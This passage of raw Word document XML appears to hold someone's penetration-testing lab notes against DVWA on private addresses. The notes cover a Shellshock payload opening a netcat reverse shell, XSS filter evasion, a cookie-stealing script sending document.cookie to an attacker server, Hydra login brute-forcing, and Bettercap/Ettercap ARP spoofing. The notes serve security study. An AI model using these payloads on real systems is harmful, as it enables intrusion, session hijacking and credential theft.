    <w:p w14:paraId="033675BB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>cd /var/www/html // shows all in a website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4F3C82" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">to get a target without a physical www setup can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> (Ip)/File name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D11C34" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="36339A42" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="74B1A59F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E2BC82F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Proxy, packet interceptor, many more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ABA3FE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Watch Out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF16D8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">anything running the proxy MUST have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> running as well</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC58ED" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Must have interceptor turned off unless you want to manually enter site to site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044C4AA0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="7DD79D62" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="53BDC0D2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>WEB ANAYLSIS &amp; VULNERABLILITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B1AD2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2660BEA9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ShellShock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="687F2119" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>snytax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> for an empty function  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7025B5C3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>ex. () { :;};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BAF971" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Must have this empty syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D004AC7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Ex. () { :;}; bin/bash -c '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> 10.0.2.6 4444 -e /bin/bash'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F418F54" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="11247DF5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Cross-site Scripting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4000DDF8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">stored </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C50553F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- stored script on server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E35024" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>refective</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B865178" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- only </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>malicous</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> link had code not server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF01AA6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>-Ex. http://10.254.73.107/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E#  Low Security!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B12AB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>usually removes &lt;script&gt;&lt;/script&gt; text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D480515" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Can sometimes be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>filltered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>lowcase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> to evade use uppercase when </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>wrinting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> &lt;script&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7E419" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>A higher level to evade the opening of script text is &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>scr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ipt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>&gt;code&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F67B61" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">since I have </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>broke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> the code by adding a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> that executes a function I can copy that site link + my code that I executed and anyone that opens it runs my executed function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E83273" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="1EE42312" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">How to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>recevice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> cookies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31223358" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">make a site to gain cookie using // python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08188D97" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>use &lt;SCRIPT&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>('&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">="http://10.254.23.184:8000/' + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> + ' "&gt;');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FC8C6F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="63A4491A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Setting Up A Firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30954EED" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">MUST BE ROOT USER </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B01A3D3" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>download https://github.com/ChrisTitusTech/firewallsetup to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6CBAA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>firewallsetup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EF015E4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">nano firewall -- this allows changes and modification to firewall </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B84C391" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>run firewall use ./firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4F4F57" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To turn off firewall use </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3A941" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>./firewall-down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A0E4C6" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="547568AE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>BRUTE FORCE USING HYDRA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DB281" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>hydra 10.254.14.210 http-form-post "/dvwa/login.php:username=^USER^&amp;password=^PASS^&amp;Login=submit:Login failed" -L usernames.txt -P Cracked\ passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F5C9CA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">if sometimes the brute force </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>doesnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> work or works too well add a cookie value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B3CCC" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="056845F7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>BRUTE FORCE USING BURPSUITE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50BEEB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Get the logon page through the logger and send it to intruder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B8FAF7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Choose the type of attack and set parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2380950C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Make sure that all redirections are on </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E2B37F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="120CC337" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Bettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EA9D1AD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>(MUST BE IN ROOT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DD9245" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>net.probe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0641324B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- discovers all network host in our local area network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3316D4" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>arp.spoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58FF839A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Takes broadcast ARP request of another IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D689AD0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>net.sniff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1107FEAC" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Sniffs packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC1CF8B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>iface</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> eth0 -caplet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sniff.cap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7843F723" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">runs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> // uses our online interface of eth0 (ethernet) // caplet uses a text sheet and looks for commands to run in that sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626CEC6E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">using the nano </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sniff.cap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> I can change the objective of what I want to target and do in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>bettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B71566" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="15BCB0F1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Ettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DCBA96" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>(STILL IN ROOT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EEC656" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">To always make sure packet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>fowarding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> is always on use </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3BB3C7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- cat /proc/sys/net/ipv4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ip_forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C6C9E4E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- If 1 then its active if 0 then it is not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E01D4F9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- To change to a 1 use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07544EF8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- echo 1 &gt; /proc/sys/net/ipv4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ip_forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="486632E5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">To start Ettercap use: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -G (for graphical interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BB5AE1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">When looking for things to do look at the top of the window </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159A1B7E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>- Check: is to start running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D7BA0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
